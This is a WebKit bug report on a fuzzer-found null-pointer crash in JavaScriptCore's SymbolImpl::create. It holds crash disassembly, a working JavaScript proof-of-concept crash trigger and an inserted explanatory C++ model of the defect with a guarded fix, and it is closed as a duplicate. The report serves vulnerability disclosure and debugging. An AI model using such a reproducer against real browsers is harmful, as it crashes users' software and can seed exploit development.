Bug 199796 - Found a bug while fuzzing
https://bugs.webkit.org/show_bug.cgi?id=199796
Status: RESOLVED DUPLICATE of bug 197634

zhoujielun
Reported 2019-07-15 04:29:35 PDT
# env
ubuntu 18.04
webkit cb9ca26

# bug
It crashed in the function WTF::SymbolImpl:

   0x1ef6345 <WTF::SymbolImpl::create(WTF::StringImpl&)+5>  push r12
   0x1ef6347 <WTF::SymbolImpl::create(WTF::StringImpl&)+7>  push rbx
   0x1ef6348 <WTF::SymbolImpl::create(WTF::StringImpl&)+8>  mov r15, rsi
 → 0x1ef634b <WTF::SymbolImpl::create(WTF::StringImpl&)+11> mov r14, rdi
   0x1ef634e <WTF::SymbolImpl::create(WTF::StringImpl&)+14> lea rdi, [rip+0x9104a7]        # 0x28067fc
   0x1ef6355 <WTF::SymbolImpl::create(WTF::StringImpl&)+21> call 0x7b2890 <__sanitizer_cov_trace_pc_guard>
   0x1ef635a <WTF::SymbolImpl::create(WTF::StringImpl&)+26> mov ebp, DWORD PTR [r15+0x10]
   0x1ef635e <WTF::SymbolImpl::create(WTF::StringImpl&)+30> mov eax, ebp
   0x1ef6360 <WTF::SymbolImpl::create(WTF::StringImpl&)+32> and eax, 0x3

The r15 here is NULL; this is passed from the PrivateName function. The rsi passed into the chunk is a value from the stack, and it's NULL.

$r14 : 0x00007fffffffc400 → 0x0000000000000000

When we check the source code, we found that the JavaScript code triggered JavaScript's internal method Symbol::create(). This function will new a Symbol object, and will call the Symbol function inside it.

Symbol* Symbol::create(ExecState* exec, JSString* description)
{
    VM& vm = exec->vm();
    String desc = description->value(exec);
    Symbol* symbol = new (NotNull, allocateCell<Symbol>(vm.heap)) Symbol(vm, desc);
    symbol->finishCreation(vm);
    return symbol;
}

In this Symbol function, it will call another create function:

    enum DescriptionTag { Description };
    explicit PrivateName(DescriptionTag, const String& description)
        : m_uid(SymbolImpl::create(*description.impl()))
    {
    }

However, the rsi is NULL...
# poc
function main() {
    function v3(v4,v5,v6,v7,v8) {
        'use strict'
        const v10 = Symbol(v6);
        function v12(v13,v14,v15,v16,v17) {
            'use strict'
            const v20 = [-268435456,-3654755103];
            const v21 = [-3654755103,v20];
            let v24 = v21;
            const v25 = v24.toLocaleString();
            const v26 = v25.padEnd(2147483647,Promise);
            const v27 = v3(Promise,"gBxRp/rynU",v26);
        }
        const v28 = new Promise(v12);
    }
    const v29 = new Promise(v3);
}
// noDFG/noFTL are jsc shell helpers that keep main() out of the optimizing JIT tiers
noDFG(main);
noFTL(main);
main();
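The report traces the fault to a reference formed from a possibly-null `impl()` pointer: the crash surfaces inside `SymbolImpl::create`, but the missing check is in the caller. The following is an added example written for this page, not WebKit code; the `String`, `StringImpl` and `SymbolImpl` types are toy stand-ins that borrow WTF's names, and the guarded variant returning `nullptr` is a contract chosen for illustration, since the page does not describe the actual fix in bug 197634.

```cpp
#include <cassert>
#include <cstdint>
#include <memory>
#include <string>
#include <utility>

// Toy stand-ins for the WTF types named in the report (assumptions for this
// example, not WebKit's definitions).
struct StringImpl {
    std::string chars;
    uint32_t hashAndFlags = 0; // plays the role of the word read at [r15+0x10]
};

// A String whose impl() may be null. WTF's String has a "null String" state and
// impl() returns a pointer, so callers must not blindly dereference it.
class String {
public:
    String() = default; // null String: impl() == nullptr
    explicit String(std::string s)
        : m_impl(std::make_shared<StringImpl>(StringImpl{std::move(s)})) {}
    StringImpl* impl() const { return m_impl.get(); }
    bool isNull() const { return !m_impl; }
private:
    std::shared_ptr<StringImpl> m_impl;
};

struct SymbolImpl {
    std::string description;
    uint32_t flags;
    // Takes a reference, so the callee assumes it is valid. If the caller formed
    // the reference from a null pointer, the first field read here faults, which
    // matches the backtrace: the crash is inside create(), the defect is upstream.
    static std::shared_ptr<SymbolImpl> create(StringImpl& impl) {
        return std::make_shared<SymbolImpl>(SymbolImpl{impl.chars, impl.hashAndFlags & 0x3});
    }
};

// Mirrors the PrivateName constructor quoted in the report: no null check
// before *description.impl(). Calling this with a null String forms a null
// reference, which is undefined behaviour, so the test never does.
std::shared_ptr<SymbolImpl> makeSymbolUnchecked(const String& description) {
    return SymbolImpl::create(*description.impl());
}

// Guarded form: reject the null String at the boundary instead of forming a
// null reference. Returning nullptr is a contract chosen for this example.
std::shared_ptr<SymbolImpl> makeSymbolChecked(const String& description) {
    if (description.isNull())
        return nullptr;
    return SymbolImpl::create(*description.impl());
}

// Models a description whose construction did not produce a value: a helper
// that fails hands back the null String (assumption for this example; it is one
// way a null impl() reaches the constructor above).
String descriptionOrNull(bool built, std::string value) {
    return built ? String(std::move(value)) : String();
}

int main() {
    auto ok = makeSymbolChecked(descriptionOrNull(true, "desc"));
    assert(ok && ok->description == "desc");
    assert(makeSymbolChecked(descriptionOrNull(false, "")) == nullptr);
    return 0;
}
```

The practical check to carry over is at the API boundary: any function that takes a `T&` built from `*ptr` is only as safe as the caller's null handling, and a sanitizer backtrace that ends in the callee's first field access is the usual signature of this pattern.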
Radar WebKit Bug Importer
Comment 1
2019-07-15 16:14:24 PDT
<rdar://problem/53127278>
Yusuke Suzuki
Comment 2
2019-07-30 10:54:02 PDT
*** This bug has been marked as a duplicate of bug 197634 ***